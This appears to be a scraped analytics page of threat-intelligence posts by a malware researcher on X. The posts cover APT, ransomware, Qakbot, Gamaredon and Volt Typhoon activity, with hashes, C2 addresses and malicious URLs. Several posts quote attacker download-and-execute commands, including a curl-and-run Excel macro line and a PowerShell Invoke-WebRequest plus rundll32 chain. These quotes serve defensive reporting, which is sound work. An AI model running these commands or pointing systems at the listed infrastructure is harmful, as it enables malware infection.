https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability" [X Link](https://x.com/anyuser/status/1925451725642539393) 2025-05-22T07:20Z [----] followers, [----] engagements "#APT #Gamaredon Malicous HTA files contains Base-64 Encoded VBscript 6bd8ff39e46e501c7d3ece116861121207741abb92f5e12a527cdf8b7c2c4cb8 9e1d16b50209d83aaa92ad8391982d99a9cee280e51cfe2c5b9c080599697837 C2: t.me/s/oearps 137.184.2.98/jug/71.aif=Function" [X Link](https://x.com/anyuser/status/1616895455182442497) 2023-01-21T20:28Z [----] followers, 14.3K engagements "@thegrugq Also this is suspicious.A pull request for Googles oss-fuzz is opened that changes the URL for the project from to http://xz.tukaani.org/xz-utils/ http://tukaani.org/xz/ http://xz.tukaani.org/xz-utils/ http://tukaani.org/xz/" [X Link](https://x.com/anyuser/status/1773829481645457798) 2024-03-29T21:47Z [----] followers, 15.5K engagements "When Lazarus gets an reverse shell on my sandbox device" [X Link](https://x.com/anyuser/status/1649030627134521344) 2023-04-20T12:41Z [----] followers, [----] engagements "Tomorrow I will share my findings about new Lockbit [---] Ransomware sample. Details for defending your organization against this attack will be shared in this report. Stay tuned :)" [X Link](https://x.com/anyuser/status/1544005908518273024) 2022-07-04T17:11Z [----] followers, [--] engagements "Summary of the Treasury Department breach (per public sources): A key unresolved cybersecurity issue lies in securing third-party vendor relationships. cc @BushidoToken @DrunkBinary @cyb3rops @TLP_R3D" [X Link](https://x.com/anyuser/status/1876348324338618733) 2025-01-06T19:21Z [----] followers, [----] engagements "New Lockbit [---] Ransomware sample with YARA match @malwrhunterteam @struppigel https://www.virustotal.com/gui/file/0d38f8bf831f1dbbe9a058930127171f24c3df8dae81e6aa66c430a63cbe0509/detection https://www.virustotal.com/gui/file/0d38f8bf831f1dbbe9a058930127171f24c3df8dae81e6aa66c430a63cbe0509/detection" [X Link](https://x.com/anyuser/status/1548303444112396295) 2022-07-16T13:48Z [----] followers, [--] engagements "Related : (Installing Cobalt Strike shellcode by using picture) ab8fbe7e6341b306357fe4ca954f73031baa2774fb025583720ac12490612819 hxxp://47.102.122.197/1.jpg Decrypted Shellcode 7e859f2a3d5e885f06d42bd740cd4b6aff19891e9d33bc9789eb38e2a4285898 Cobalt Strike C2 hxxp://47.102.122.197:9999/q2Iq #Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔 https://t.co/worVSXpO4k #Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔 https://t.co/worVSXpO4k" [X Link](https://x.com/anyuser/status/1648381922282799123) 2023-04-18T17:44Z [----] followers, 23.7K engagements "#Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔" [X Link](https://x.com/anyuser/status/1365438427735457799) 2021-02-26T23:07Z 25.5K followers, [--] engagements "On May [--] [----] following heightened IndiaPakistan tensions Pakistan Telecommunication Company (PTCL) was hit by a phishing attack leveraging a spoofed email appearing to be from Pakistans Counter Terrorism Department using a Security Brief Report lure to deceive recipients. The email carried an ICQ (Excel Web Query) attachment. Once opened it connected to fogomyart.com/random.php and executed an Excel macro with the following command: =cmd' /c cd C:programdata & set /P="MZ"nulb1 & curl -o b2 https://fogomyart.com/vcswin & copy /b b1+b2 vcswin.exe & start /b vcswin.exe'A0 This command" [X Link](https://x.com/anyuser/status/1921506670343061548) 2025-05-11T10:04Z [----] followers, [----] engagements "🕵Gamaredon #APT activity targeting State Bureau of Investigation in Ukraine (DBR or ): Phishing email - XHTML Smuggling Payload - Download RAR - LNK - MSHTA LOLBIN Download third stage Email: 27515d71b91bbdbb55437de6b729663c0cd206d7112ddbc439d82d8a6e1dde3e HTML Payload: b5d59bb932843ca58c29971e73edfe642731701f29133eb1cfb8841e198d567f Download Second Stage RAR file from: entities-important-surgeon-ever.trycloudflare.com LNK File: 35f714c491897d32c7c68386dac02615071ae4587729dc46d524c6e468ac1cbe" [X Link](https://x.com/anyuser/status/1865043823207796759) 2024-12-06T14:41Z [----] followers, [----] engagements "Cyber Army of Russia Reborn (CARR) is an Hacktivist Telegram persona associated with #APT44 by @Mandiant. CARR prepared an training for DDOS attacks against Ukrainian targets you can see the username of the device is "SergoZar" which is likely associated with Github user "SergoZar". Persona "SergoZar" is using a public portfolio page and following himself which is Mr. Alexander Ryabov aka "ZKelo" or "SergoZar". It's just an assumption I'm not linking to Cyber Army of Russia Reborn (CARR) to this gentlemen but for me this profile is matching an interesting link. What you thing @BushidoToken" [X Link](https://x.com/anyuser/status/1781435565923061904) 2024-04-19T21:31Z [----] followers, 18.5K engagements "#Qakbot Claim_Copy_3519_Sep_20.html - ISO - LNK - JS - BAT - regsvr32 - Load times.db (DLL) times.db: 29ac39065f707311a3281268b643a66fdbd2d08c01eaea8bf6229364c69201a6 @malwrhunterteam @Gi7w0rm @Max_Mal_ @pr0xylife" [X Link](https://x.com/anyuser/status/1573361863353831425) 2022-09-23T17:21Z [----] followers, [--] engagements "🚨Here is my analysis on GLOBAL GROUP RaaS. I identified the IP address behind their Tor-based Dedicated Leak Site (DLS): 193.19.119.4. The server is hosted by IpServer a Russia-based VPS provider also previously used to host the DLS infrastructure for the Mamona RIP ransomware operation. The GLOBAL GROUP RaaS manager (alias $$$) actively seeks remote access to corporate networks via Initial Access Brokers (IABs). Targeting enterprise VPN appliances (Fortinet Palo Alto Cisco) and routinely acquires RDP access to high value targets." [X Link](https://x.com/anyuser/status/1945029879163965470) 2025-07-15T07:57Z [----] followers, 16.6K engagements "EclecticIQ links GLOBAL GROUP to the actor behind BlackLock RaaS. This group uses AI-powered ransom negotiations & a mobile control panel targeting healthcare & automotive sectors in the US UK and Europe. 👉 Learn more: #cybersecurity #ransomware https://hubs.ly/Q03xcYK00 https://hubs.ly/Q03xcYK00" [X Link](https://x.com/anyuser/status/1945014214663283108) 2025-07-15T06:55Z [----] followers, 10.6K engagements "@vxunderground The page used some Turkish language and it appears that the CSS code was copied and pasted from a random Turkish forum" [X Link](https://x.com/anyuser/status/1655691557289226248) 2023-05-08T21:50Z [----] followers, [----] engagements "Don't touch our home routers dude it's creepy 😐. According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast https://t.co/6RoMEnu5Un According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a" [X Link](https://x.com/anyuser/status/1789393023568068855) 2024-05-11T20:31Z [----] followers, [----] engagements "google-drive.zip 😂 @malwrhunterteam" [X Link](https://x.com/anyuser/status/1659638202188152832) 2023-05-19T19:12Z [----] followers, [----] engagements "Fresh #GOZI sample with [--] detection in VT. Exectuion flow: ZIP (QuickBooks-IXAUYWQ) LNK msiexec MD5: 82ff84cb9924f0855a894e75b5d3edb2 C2:sumarno.top @malwrhunterteam @StopMalvertisin @1ZRR4H https://tria.ge/230525-2j1x5sdd61/behavioral1 https://tria.ge/230525-2j1x5sdd61/behavioral1" [X Link](https://x.com/anyuser/status/1661866708997423106) 2023-05-25T22:47Z [----] followers, [----] engagements "2nd stage of PowerShell Bumblebee loader De-Obfuscated feel free to take a look : cc @Gi7w0rm @malwrhunterteam @BushidoToken https://gist.github.com/whichbuffer/0c109be7b8b01d13178c07d66cdf82d5 https://gist.github.com/whichbuffer/0c109be7b8b01d13178c07d66cdf82d5" [X Link](https://x.com/anyuser/status/1567427989939408896) 2022-09-07T08:22Z [----] followers, [--] engagements "@malwrhunterteam @JAMESWT_MHT I also wanted to mentioned an awesome tool called HashDBI used for Reverse Engineering the API Hashing @herrcore it sped up the analysis process 👏 Lockbit Decrypter was using "FNV-1a non-cryptographic hash function" for hiding the Import Tables. https://github.com/OALabs/hashdb https://github.com/OALabs/hashdb" [X Link](https://x.com/anyuser/status/1538857157566906369) 2022-06-20T12:11Z [----] followers, [--] engagements "I can confirm that the latest patch #microsoft #windows CVE-2022-26925 was related to PetitPotam founded by @topotam77. An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM" [X Link](https://x.com/anyuser/status/1524279869185609729) 2022-05-11T06:46Z [----] followers, [--] engagements "@h4x0r_dz It's not from Microsoft for sure 😅" [X Link](https://x.com/anyuser/status/1783576824787722494) 2024-04-25T19:20Z [----] followers, 13.6K engagements "Likely a APT-C-55Kimsuky) activity: ISO LNK BAT AV vendor check (Kaspersky or Avast) Download Second Stage (HTA) MD5: 5b39fc810261ce179e8348e11a840c15 URL: trusteer.ink/rapport/32.hta Previous activity similar to this : MD5: 7753f37dfbc44815282433f16b56c0ce" [X Link](https://x.com/anyuser/status/1658531073590976519) 2023-05-16T17:53Z [----] followers, [----] engagements "🕷🕸SCATTERED SPIDER phishing activities: Registrar: - Hosting Concepts B.V. d/b/a Registrar EU iuiuiemon.com - 2024-11-13 vision-victra.com - 2024-11-09 cc @BushidoToken @malwrhunterteam @TLP_R3D @AlvieriD @ImposeCost" [X Link](https://x.com/anyuser/status/1861060536776999256) 2024-11-25T14:53Z [----] followers, [----] engagements "More Racoon Stealer IOCs 🦝 MD5 Hash: 5261d68f844325d038c8b1d7d215a91e C2 Servers: 94.131.104.18 45.67.229.149 Downloader: http://193.149.129.144/rgd4rgrtrje62iuty/19658963328526236.bin cc @malwrhunterteam @malware_traffic" [X Link](https://x.com/anyuser/status/1571527103761518593) 2022-09-18T15:50Z [----] followers, [--] engagements "Pivoting possible Volt Typhoon infrastructure Each of the infrastructure is using: SSL Certifacte C=en ST=rg L=df O=vb OU=ty CN=jdyfj nginx 1.20.1 and redirect to google 2.58.15.30 66.85.27.190 45.32.174.131 cc @DrunkBinary @TomHegel @BushidoToken" [X Link](https://x.com/anyuser/status/1783603581653746037) 2024-04-25T21:06Z [----] followers, [----] engagements "Russian cybercriminals behind the DanaBot malware built a version specifically to target government and military entities. Theres no direct proof Russian intelligence is involved but its likely they benefit from or use the tools and access these backdoored systems. https://www.justice.gov/usao-cdca/pr/16-defendants-federally-charged-connection-danabot-malware-scheme-infected-computers https://www.justice.gov/usao-cdca/pr/16-defendants-federally-charged-connection-danabot-malware-scheme-infected-computers" [X Link](https://x.com/anyuser/status/1925996443103371384) 2025-05-23T19:25Z [----] followers, [----] engagements "Reversing Go binary on IDA. We can see that it's being used for getting Initial Access on victim device by communicating with C2_IP over port [----] and Powershell.exe will be used as default Command and Scripting Interpreter by the attacker. @malwrhunterteam" [X Link](https://x.com/anyuser/status/1552372042544156673) 2022-07-27T19:15Z [----] followers, [--] engagements "The SAP NetWeaver exploit (CVE-2025-31324) is seriously bad. Ive seen some of the targets its horrifying. There are critical infrastructure networks affected 😬" [X Link](https://x.com/anyuser/status/1917710109054230876) 2025-04-30T22:38Z [----] followers, [----] engagements "There is a lot of disinformation and counterintelligence activity circulating in Telegram channels. If you are a journalist or a CTI analyst stay cautious your role is to provide accurate information not to amplify the hype" [X Link](https://x.com/anyuser/status/1958524220918407320) 2025-08-21T13:38Z [----] followers, [----] engagements "Just use Linux nerds" [X Link](https://x.com/anyuser/status/1814233813125329165) 2024-07-19T09:40Z [----] followers, [----] engagements "Rhadamanthys info stealer malware using EU GDPR phishing lure. After the execution it opens an PDF document as a part of the lure. C2: 141.98.82.254 41f7c8ae34676fe524a70b8474e1c31c42d70301edf091c1e8ae320b7f3d1646" [X Link](https://x.com/anyuser/status/1608089945985486852) 2022-12-28T13:18Z [----] followers, [----] engagements "@hackerfantastic lmao" [X Link](https://x.com/anyuser/status/1898080429972111628) 2025-03-07T18:36Z [----] followers, [----] engagements "PlugX Payload (work2022.tmt) is encrypted with an XOR key "0x1E43" it's being decrypted by PlugX loader "LMIGuardianDLL.dll" on execution. Decrypted payload can be found here Decrypted PlugX config file can be seen in image https://www.virustotal.com/gui/file/a9f7d06b9929be61853910876129318ef56efd1eaef168e9ac412a090a6f09danocache=1 #MustangPanda #APT Summary MSs reporting - recommendationl.zip ecb1650d5f548f10be47aaa84f7546c0 Summary MSs reporting - recommendationl.doc.lnk 2db2698bd4c922a04db0839e6fc1146b LMIGuardianDll.dll aa47fc240f70945b80413ac3c714e2a2 LMIGuardianDat.dat" [X Link](https://x.com/anyuser/status/1611006137112961027) 2023-01-05T14:26Z [----] followers, [----] engagements "#MustangPanda #APT Summary MSs reporting - recommendationl.zip ecb1650d5f548f10be47aaa84f7546c0 Summary MSs reporting - recommendationl.doc.lnk 2db2698bd4c922a04db0839e6fc1146b LMIGuardianDll.dll aa47fc240f70945b80413ac3c714e2a2 LMIGuardianDat.dat" [X Link](https://x.com/anyuser/status/1610961056163311619) 2023-01-05T11:27Z 16.4K followers, 21.1K engagements "Ukrainian City Councils (Pechersk and Khmelnytskyi) were very likely targeted by an unknown threat actor. A spear-phishing email was used to deliver an encrypted RAR attachment containing Remcos RAT. https://www.virustotal.com/gui/file/af600672e924a603bd96687954d7bb26950f1e891d923bff99981a91a0626026 https://www.virustotal.com/gui/file/af600672e924a603bd96687954d7bb26950f1e891d923bff99981a91a0626026" [X Link](https://x.com/anyuser/status/1628838062586228736) 2023-02-23T19:23Z [----] followers, [----] engagements "Qilin ransomware affiliate hastalamuerte claims he lost $48K after a ransom negotiation mysteriously disappeared from a Tox chat. In the same thread another actor Nova posted credentials and a screenshot of Qilins affiliate panel to embarrass the group. ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd.onion" [X Link](https://x.com/anyuser/status/1950934137881207205) 2025-07-31T14:58Z [----] followers, [----] engagements "CheckZilla is being used by Threat Actors for calculating the evasiveness of a #Malware automatically the idea is unlike the VirusTotal it don't sends meta data to AV vendors CheckZilla also being advertised under RAMP forum. @malwrhunterteam @JAMESWT_MHT" [X Link](https://x.com/anyuser/status/1543163545948508164) 2022-07-02T09:23Z [----] followers, [--] engagements "Arkana Ransomware affiliates likely targeted the WideOpenWest (ISP in California) by compromising Appian (code automation platform) and Symphonica (cloud-native orchestration platform). Some key cloud security takeaways: 1- Avoid exposing company identifiers (e.g. name SSL certs logo) in cloud assets. 2- Continuously monitor for leaked or reused credentials. 3- Audit third-party SaaS configurations and access permissions regularly. 4- Use 2FA :( cc @BushidoToken @vxunderground @DrunkBinary @LawrenceAbrams https://web.archive.org/web/20250324043643/https://wowinc.appiancloud.com/suite/ Arkana" [X Link](https://x.com/anyuser/status/1904456464539832659) 2025-03-25T08:52Z [----] followers, [----] engagements "Arkana ransomware group claims to have compromised an Internet Service Provider in California. They were even nice enough to put together a music video montage illustrating the level of access they possess" [X Link](https://x.com/anyuser/status/1904364394709999970) 2025-03-25T02:47Z 418K followers, 63.1K engagements "I'm following a generic backdoor that I named as "Kerper" because of the PDB file path. The C2 connections depend on the variations. So far I have seen that Microsoft Graph API and Microsoft Azure (akams.azurewebsites.net) services were abused" [X Link](https://x.com/anyuser/status/1641491946534215680) 2023-03-30T17:25Z [----] followers, [----] engagements "YARA rule to detect this new camping. https://github.com/whichbuffer/eiq-community-exchange/blob/30d58253c6bc29bf223fd55c4af6ac0701b537e6/yara/Windows_1000-1999/Y1801.yara#L70 #Qakbot - BB14 - .one .cmd .ps .dll cmd.exe /c Open.cmd powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:programdataputty.jpg rundll32 C:programdataputty.jpgWind IOC's https://t.co/iJ3jXKg9aB https://t.co/5kmcgUPnIh https://github.com/whichbuffer/eiq-community-exchange/blob/30d58253c6bc29bf223fd55c4af6ac0701b537e6/yara/Windows_1000-1999/Y1801.yara#L70 #Qakbot - BB14 - .one .cmd .ps .dll" [X Link](https://x.com/anyuser/status/1623092200568508418) 2023-02-07T22:51Z [----] followers, [----] engagements "#Qakbot - BB14 - .one .cmd .ps .dll cmd.exe /c Open.cmd powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:programdataputty.jpg rundll32 C:programdataputty.jpgWind IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB14_07.02.2023.txt https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB14_07.02.2023.txt" [X Link](https://x.com/anyuser/status/1623075145773379584) 2023-02-07T21:44Z 21.1K followers, 34.6K engagements "🎉 Happy to share that my talk has been accepted at @virusbtn Ill be presenting in Berlin on Friday September [--] at #VB2025: Details: See you there #vbconference https://www.virusbulletin.com/conference/vb2025/abstracts/cracked-gru-how-russias-notorious-sandworm-unit-weaponizes-pirated-software-usage-target-ukraine/ https://www.virusbulletin.com/conference/vb2025/abstracts/cracked-gru-how-russias-notorious-sandworm-unit-weaponizes-pirated-software-usage-target-ukraine/" [X Link](https://x.com/anyuser/status/1918308833744552439) 2025-05-02T14:17Z [----] followers, [----] engagements Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing
@WhichbufferArda Arda Büyükkaya
Arda Büyükkaya posts on X about actor, in the, microsoft, apt the most. They currently have [-----] followers and [---] posts still getting attention that total [--] engagements in the last [--] hours.
Engagements: undefined #
- [--] Week [--] -82%
- [--] Month [-----] -79%
- [--] Months [-------] -48%
- [--] Year [-------] -32%
Mentions: undefined #
- [--] Months [--] -17%
- [--] Year [--] -14%
Followers: [-----] #
- [--] Week [-----] +0.10%
- [--] Month [-----] +0.25%
- [--] Months [-----] +9%
- [--] Year [-----] +38%
CreatorRank: undefined #
Social Influence
Social category influence technology brands stocks countries finance social networks cryptocurrencies currencies ncaa football travel destinations
Social topic influence actor, in the, microsoft, apt, key, file, mobile, data, network, windows
Top assets mentioned Microsoft Corp. (MSFT) Crowdstrike Holdings Inc (CRWD) Cloudflare, Inc. (NET) Alphabet Inc Class A (GOOGL) CyberConnect (CYBER) OORT (OORT) Raytheon Technologies Corp (RTX)
Top Social Posts
Top posts by engagements in the last [--] hours
"@malwrhunterteam @ShadowChasing1 @h2jazi @cyb3rops Here is the decrypted C2 URL: hxxps://cryptyk.ddns.net It's being stored inside the PDF file and Encrypted with [---] byte long XOR key decryption done by encrypt_pdf function upon execution of malware"
X Link 2023-05-12T11:13Z [----] followers, [---] engagements
"Malware Deobfuscation with @OpenAI Remcos malware delivery via ISO Obfuscated VBS Powershell Download Second Stage Inject into ielowutil.exe Injected Remcos: https://tria.ge/230812-t6nmbscf33/static1 https://tria.ge/230812-t6nmbscf33/static1"
X Link 2023-08-12T16:46Z [----] followers, 15K engagements
"@ImposeCost Its Turkish barber shops doing ASMR videos :p you can search them in your area but I dont think you can find it in Virginia"
X Link 2023-09-10T17:05Z [--] followers, [--] engagements
"Backdoor found in XZ Utils versions 5.6.0 and 5.6.1 that is leading to ssh server compromise. This activity was assignedCVE-2024-3094. XZ Utils is data compression software 👀"
X Link 2024-03-29T20:44Z [----] followers, [----] engagements
"Testing the XZ Utils backdoor kill switch (yolAbejyiejuvnup=Evjtgvsh5okmkAvj) this string stop the backdoor so it won't hooking into RSA_public_decrypt() function"
X Link 2024-04-01T09:26Z [----] followers, 62K engagements
"Subdomain enumeration with open source tool called SubEnum F5 BIG-IP (CVE-2023-46747) exploit ARP scan on internal network after the exploit Port / Service enumeration Lateral movement toMSSQL Database Server Credential dump from MSSQL server RDP into MSSQL server data exfiltration. Linked to the Cyber Court and Makhlab al-Nasr Pro-Palestinian hacking group. cc @BushidoToken #BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the"
X Link 2024-04-04T09:26Z [----] followers, 53.4K engagements
"@utkusen https://www.virustotal.com/gui/file/3fe7211742fc790d5b26b04bc4a1f707abd1fd6ae27b79947a842c9863a94711/details https://www.virustotal.com/gui/file/3fe7211742fc790d5b26b04bc4a1f707abd1fd6ae27b79947a842c9863a94711/details"
X Link 2024-04-13T19:18Z [----] followers, [----] engagements
"@utkusen Bunu sadece isim benzerliinden buldum o yzden gerekten bu zararl m kullanld yoksa baka bir zararl m tam bilmiyorum. CrowdStrike ok byk ihtimalle yakalar"
X Link 2024-04-13T20:41Z [----] followers, [--] engagements
"Cyber Army of Russia Reborn (CARR) is an Hacktivist Telegram persona associated with #APT44 by @Mandiant. CARR prepared an training for DDOS attacks against Ukrainian targets you can see the username of the device is "SergoZar" which is likely associated with Github user "SergoZar". Persona "SergoZar" is using a public portfolio page and following himself which is Mr. Alexander Ryabov aka "ZKelo" or "SergoZar". It's just an assumption I'm not linking to Cyber Army of Russia Reborn (CARR) to this gentlemen but for me this profile is matching an interesting link. What you thing @BushidoToken"
X Link 2024-04-19T21:31Z [----] followers, 18.5K engagements
"🤣cc @herrcore https://github.com/NationalSecurityAgency/ghidra/assets/42712921/ba4acc7f-f7d5-4cdf-be86-44eb503fe0cc https://github.com/NationalSecurityAgency/ghidra/assets/42712921/ba4acc7f-f7d5-4cdf-be86-44eb503fe0cc"
X Link 2024-04-21T10:13Z [----] followers, [----] engagements
"@ThisMyHandle @herrcore Its TLP:RED nah just open an issue and upload your stuff in thay comment then copy the link here you go magic"
X Link 2024-04-21T12:29Z [----] followers, [---] engagements
"According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast Reverse Proxy (FRP) to maintain persistent access to victim networks. When I analyzed the UPX-packed FRP sample referenced in the report I discovered the string 'MAGA2024' alongside a hardcoded 64.183.202.102 C2 IP address. This IP is linked to an SSL certificate for a 'Vigor Router' and with a location metadata as"
X Link 2024-05-11T19:44Z [----] followers, 75.6K engagements
"Microsoft Report: UPX Packed FRP: 472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d Unpacked FRP: a0e581c0698a64bcb97f239172b31ed9009de1a89ba0d0e1e2fce2dfc6a496c0 C2 IP: 64.183.202.102 cc @BushidoToken https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/ https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/"
X Link 2024-05-11T19:44Z [----] followers, [----] engagements
"@BushidoToken With low confidence since compromised C2 IP is DrayTek Vigor2960 Series router threat actor probably used CVE-2020-19664 RCE. https://github.com/peanuts62/bug_poc https://github.com/peanuts62/bug_poc"
X Link 2024-05-11T21:20Z [----] followers, [----] engagements
"I woke up and looked at my livehunt alerts in VT. I saw the confidential emails accidentally uploaded by one of the Five Eye countries. I shut down my laptop and took a walk"
X Link 2024-05-30T20:45Z [----] followers, [---] engagements
"The rise of the far-right movements in Europe. Interesting political trend to watch for it. The state of France this evening This shows the party that came top in voting for the European Parliament on June [--] in every commune in France. Brown represents the far right https://t.co/PP0C5KjrIW The state of France this evening This shows the party that came top in voting for the European Parliament on June [--] in every commune in France. Brown represents the far right https://t.co/PP0C5KjrIW"
X Link 2024-06-09T21:26Z [----] followers, [---] engagements
"@RussianPanda9xx Thats why I love CTI community 😎"
X Link 2024-06-19T04:45Z [----] followers, [---] engagements
"@jamieantisocial @Gi7w0rm @DrunkBinary @AShukuhi Thank you 😊"
X Link 2024-06-20T06:41Z [----] followers, [---] engagements
"🌟 Exciting Announcement I am happy to share that I will be attending and presenting at the ENISA Cyber Threat Intelligence (CTI) for Europe conference on October 1st The event will be held at the Hotel Thon Bristol Stephanie in Brussels Belgium. I will present my latest research on the "Rebranding of the Caffeine Phishing Kit Targeting Financial Institutions." This topic is part of the session on using open-source intelligence (OSINT) and technical intelligence (TECHINT) for analysis scheduled from 11:30 to 12:30. Join me and other industry experts as we delve into the latest developments in"
X Link 2024-07-13T09:00Z [----] followers, [---] engagements
"I created a simple Group Policy (GPO) to automatically fix CrowdStrike BSOD (Blue screen of death) issue. https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS"
X Link 2024-07-19T08:20Z [----] followers, 120.4K engagements
"Fake CVE exploit POCs especially for high-profile vulnerabilities like CVE-2024-38063 are unfortunately a common tactic used by malicious actors to distribute malware over Github. https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection"
X Link 2024-08-17T21:40Z [----] followers, 18.6K engagements
"🚨 Beware Threat actors are using PDFs to lure victims into installing the FleetDeck RMM tool. These malicious PDFs embed a URL (agent.fleetdeck.io) behind a button tricking users to click and download the FleetDeck executable. Once installed this remote management tool could give attackers control over your device. #CyberSecurity #PhishingAlert"
X Link 2024-08-22T21:38Z [----] followers, [--] engagements
"Here is a one that target users in Netherlands with Dutch langue. They are using Real Estate lure this time. Same author was observed over and over "Dennis Block""
X Link 2024-08-22T21:44Z [----] followers, [---] engagements
"🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity #ThreatIntelligence #Ransomware #CloudSecurity https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries"
X Link 2024-09-10T15:37Z [----] followers, 37.6K engagements
"Ive outlined the full Ransomware Deployment Life Cycle for cloud environments detailing key stages of attack persistence and execution.Also dont miss the deep dive on Telecom Enemies a Developer-as-a-Service (DaaS) group empowering phishing and cyberattacksusing tools like the Gorilla Call Bot for vishing attacks. Their influence is growing within underground forums. 🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. https://t.co/awFf6sUDYB cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity"
X Link 2024-09-10T15:40Z [----] followers, 14.1K engagements
"It seems like someone popped OpenAIs X account to spread some crypto scam. Remember kids there is no free or easy money. Stay safe ☢"
X Link 2024-09-23T22:35Z [----] followers, [----] engagements
"Today I had the privilege of presenting at the ENISA CTI Conference in Brussels . It was a fantastic experience with insightful speakers and excellent networking opportunities"
X Link 2024-10-01T17:07Z [----] followers, [---] engagements
"The costs of fragmentation:as trade falls and barriers rise global growth likely take a severe hit in coming years. According to the latest International Monetary Fund projectionsannual global GDP growth in [----] will be only three percentthe IMFs lowest five-year-ahead forecast in the past three decadeswhich spells trouble for poverty reduction and for creating jobs among burgeoning populations of young people in developing countries. Fragmentation risks making this already weak economic picture even worse. As growth falls opportunities vanish and tension builds the worldalready divided by"
X Link 2024-10-27T15:39Z [----] followers, [---] engagements
"🚨🕷 Proud to share my latest research on the LUNAR SPIDER campaign. Our findings reveal how RaaS operators leveraged LUNAR SPIDERs malware including IcedID and the Latrodectus loader along with Brute Ratel C4 infrastructure to enable their attacks on the financial sector. cc @BushidoToken @HackingLZ @cyb3rops @MichalKoczwara @RussianPanda9xx @ddd1ms @jstrosch https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus"
X Link 2024-10-30T13:11Z [----] followers, 31.8K engagements
"🚨 New threat research: SilkSpecter a likely China-based threat actor is targeting EU & US e-commerce shoppers for financial fraud by using fake Black Friday sites to steal victims' debit and credit card details. https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers"
X Link 2024-11-14T14:50Z [----] followers, 10.8K engagements
"The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the groups credential theft campaigns. cc @BushidoToken https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted"
X Link 2024-11-20T19:38Z [----] followers, 37.3K engagements
"Phishing domain tmobiie.us was created by Tyler Robert Buchanan aka "bobsagetfaget" or "BUCHANAN". You can see the reverse whois lookup result. The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the groups https://t.co/HUQgImtn5P The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email"
X Link 2024-11-20T19:51Z [----] followers, 18.5K engagements
"Very Similar domains over here: tmobiie.com staging.tmobiie.com mintmobiie.com tmobiie.net americafirstmobiie.com okta-tmobiie.net okta.tmobiie.net"
X Link 2024-11-20T19:56Z [----] followers, [---] engagements
"After using some cool network pivoting tricks and a zero-day privilege escalation the threat actor leveraged noisy reg.exe to dump SAM credentials and PowerShell to compress the results. https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/ https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
X Link 2024-11-22T18:21Z [----] followers, [----] engagements
